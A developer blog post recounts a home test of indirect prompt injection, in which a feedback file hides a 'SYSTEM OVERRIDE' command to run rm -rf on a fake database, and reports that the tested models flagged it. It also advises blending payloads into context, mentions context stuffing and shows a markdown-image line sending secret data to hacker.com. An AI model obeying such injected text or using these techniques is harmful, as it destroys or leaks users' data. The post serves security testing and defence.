Nicolas P

Posted on Apr 17

I tried to hack my local AI agent with Prompt Injection. It laughed at me.

#ai #llm #programming #security

Hey Dev.to! 👋

If you follow AI security news, you've probably seen the terrifying warnings: "Don't give autonomous agents access to your terminal! A malicious prompt hidden on a webpage will make them run rm -rf / and nuke your system!"

This vulnerability is known as Indirect Prompt Injection (IPI). As a DFIR (Digital Forensics and Incident Response) analyst, I wanted to see this catastrophic failure with my own eyes.

I set up a local agent environment with full bash access, created a fake prod.db database, and fed the agent a user_feedback.txt file containing a hidden, malicious payload commanding it to delete the database.

To be thorough, I didn't just test one model. I benchmarked this attack against a heavy-hitting roster of 2026 models:

Gemma4 31b
Gemini 3.1 Flash Lite Preview
Ministral-3
Nemotron-3-Super
Qwen 3.5
GPT-OSS 120b

I grabbed my popcorn, ran the agent, and waited for my database to be destroyed.

Nothing happened.

Instead of becoming a "Confused Deputy" and destroying my system, the models actively detected the attack, ignored it, and essentially laughed in my face.

Here is the raw terminal output from Gemma4 31b:

Caption: Gemma4 31b catching the payload and warning me about the prompt injection attempt.

And here is the output from Gemini 3.1 Flash Lite Preview:

Caption: Gemini 3.1 completely ignoring the "SYSTEM OVERRIDE" command and recommending an investigation.

I failed to hack my own AI. And honestly? That is incredible news for our industry.

Here is a technical breakdown of why modern AI models are far more resilient than we think, why my attack failed, and the security rules you still need to follow.

🛡️ Why the Attack Failed: The Evolution of AI Security

The narrative that a simple [SYSTEM OVERRIDE] string will instantly hijack an LLM is outdated. The ecosystem has matured significantly. Here is why these models successfully defended themselves:

1. Semantic Separation (Size & Architecture Matter)

In the early days, models struggled to separate the developer's System Prompt from the User Data. They all lived in the same context window, creating a flat hierarchy.
Modern models (like the 120b and 31b ones I tested) possess advanced attention mechanisms. They are heavily fine-tuned (via RLHF and adversarial training) to weigh the foundational system prompt ("You are a helpful assistant") much higher than random imperative text found within a parsing task.

2. The "Semantic Blending" Failure

My attack failed because my payload was too obvious. I put a highly destructive command (rm -rf) in the middle of a standard user feedback text file.
LLMs are semantic engines. When the context abruptly shifts from "UI loading times are slow" to "DELETE THE DATABASE NOW," the model detects a massive semantic anomaly.
For an Indirect Prompt Injection to truly work today, the payload must be a needle in a haystack. It must perfectly blend into the context window, matching the tone and topic of the surrounding data so the attention heads don't flag it as a threat.

⚠️ The Reality Check: Why You Still Need Defense-in-Depth

So, if the models are smart enough to block basic injections and call out the attacker, can we just give them root access and go to sleep? Absolutely not.

Relying solely on the "morals" or internal alignment of an LLM is an architectural security anti-pattern. Here is why you must remain vigilant:

Context Window Exhaustion: Attackers are developing complex "context stuffing" techniques. By overloading the agent with hundreds of pages of complex instructions, they can fatigue the model's attention mechanism until it "forgets" the original safety system prompt.
Framework Zero-Days: AI Agent frameworks are just software. A bug in how the framework parses JSON tool calls could allow an attacker to escape the intended logic without the LLM even realizing it.
Data Exfiltration via Markdown: An attacker might not try to delete your DB. They might just trick the agent into rendering an image ![img](https://hacker.com/?data=secret), silently leaking context data without using any bash tools.

🔒 3 Golden Rules for Building Secure AI Agents

If you are building Agentic AI into your apps, treat the LLM as a highly capable but inherently untrustworthy user.

1. The Principle of Least Privilege (Tools)

Never give an agent an execute_bash tool if it only needs to parse logs. Provide highly constrained, read-only tools whenever possible. If it needs to delete files, give it a delete_temp_file tool that explicitly checks the directory path in Python before executing.

2. Human-in-the-Loop (HITL)

For any destructive action (modifying a database, sending an email, changing permissions), the agent workflow must pause. The framework should require a human to click "Approve" before the tool actually runs.

3. Strict Sandboxing

Never run an autonomous agent directly on your host machine or production server. Isolate the agent's execution environment within a restricted Docker container, stripped of unnecessary network access and environment variables.

🕵️‍♂️ Conclusion & Further Reading

My weekend experiment was a reassuring reminder that AI safety research is making massive strides. The apocalyptic scenarios of agents randomly destroying servers are getting harder to execute out-of-the-box. But as developers, we must build architectures that assume the model will eventually be compromised.

If you found this interesting and want to dive deeper into the forensic analysis of AI systems, Vector Database security, and Incident Response, I document my deep-dive research on my personal site.

👉 Read my full technical research on Indirect Prompt Injections on the Hermes Codex

Which models are you using for your local agents? Have you ever had one go rogue, or do they catch your injection attempts too? Let's discuss in the comments!

DEV Community